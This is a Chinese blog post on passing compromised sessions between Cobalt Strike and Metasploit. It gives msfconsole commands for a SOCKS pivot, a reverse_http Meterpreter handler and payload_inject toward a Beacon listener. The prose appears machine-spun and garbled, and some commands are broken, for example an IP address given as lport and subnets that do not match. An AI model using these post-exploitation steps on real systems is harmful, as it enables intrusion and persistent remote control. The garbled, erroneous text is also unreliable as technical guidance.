Cobaltstrike与MSF对话承继

前言

一般在渗透到的全全过程中,Get到shell之后一般来说我非常喜爱公布到Cobaltstrike,但是Cobaltstrike的对话是60S升級一次,有时候功效也并沒有MSF完善(我的软件不够强劲哈哈哈),那么今天我提前准备记录一下如何进行Cobaltstrike与MSF的联动,并且在下面2~3篇文章内容內容里,我提前准备关键讲一下隧道施工工程施工技术性性,尤其是ssh隧道施工技术性、SOCK4隧道施工技术性、SOCK5隧道施工技术性。

正文

Cobastrike搭建SockS隧道施工

最开始Cobaltstrike得到 一个对话,接着搭建SockS。
Cobaltstrike与MSF对话诞生插图

接着再view里找寻Proxy Pivots,点一下Tunnel查看互联网设定。
Cobaltstrike与MSF对话诞生插图1
打开MetASPloit,设置Socks地区代理

msf6 > setg Proxies socks4:192.168.37.129:8265 //设置走Cobaltstrike的地区代理安全性安全通道
Proxies => socks4:192.168.37.129:8265			
msf6 >  setg ReverseAllowProxy true				//设置允许双向安全出口
ReverseAllowProxy => true
msf6 > use auxiliary/scanner/ip/ipidseq  		//设置寻找空闲网络服务器
msf6 auxiliary(scanner/ip/ipidseq) > show options
msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135
RHOSTS => 192.168.37.128-135
msf6 auxiliary(scanner/ip/ipidseq) > run

发现获得成功扫描机到空闲网络服务器:
Cobaltstrike与MSF对话诞生插图2

Cobaltstrike承继对话

当Cobaltstrike得到 到公布网络服务器后,有时候务必传输对话到MSF,操作过程下列:

最开始建立新的Foreign HTTP监听器,设置IP为MSF接纳的IP,设置Port是一会儿MSF监控的端口
Cobaltstrike与MSF对话诞生插图3

接着打开MSF,设置好监听器:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload Windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.37.134
lhost => 192.168.37.134
msf6 exploit(multi/handler) > set lport 8088
lport => 8088
msf6 exploit(multi/handler) > run -j

接着打开Cobaltstrike,共享对话,方法 下列,在对话栏里选择spawn,选择payload为刚设置的MSFpayload,选择Choose后Metasploit接纳到对话。

Cobaltstrike与MSF对话诞生插图4

Metasploit承继对话

倘若Metasploit早就得到 到一个对话,可以依据payload_inject操纵控制模块进行对话承继,将对话传输到Cobaltstrike。

这里我尝试最先用MSF进行流量数据信息数据加密,再进行对话承继,具体可参考blog:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。

操作过程下列,最开始Cobaltstrike建立新Becon HTTP的监听器,设置好监控的IP和Port
Cobaltstrike与MSF对话诞生插图5
接着得到 到MSF的对话后,务必开启payload_inject模块,方法 下列

msf6> use exploit/windows/local/payload_inject 
msf6> set payload windows/meterpreter/reverse_http  //注意payload的匹配
msf6> set Session 2					//务必共享对话的SESSION
msf6> set lhost 192.168.34.129		//设置务必共享的IP
msf6> set lport 192.168.34.129 		//设置务必共享的port
msf6> run							//慢慢共享

可以获得成功看到对话就共享成功了:
Cobaltstrike与MSF对话诞生插图6
这时候Cobaltstrike的对话也会被数据库加密,更加的安全系数一。
Cobaltstrike与MSF对话诞生插图7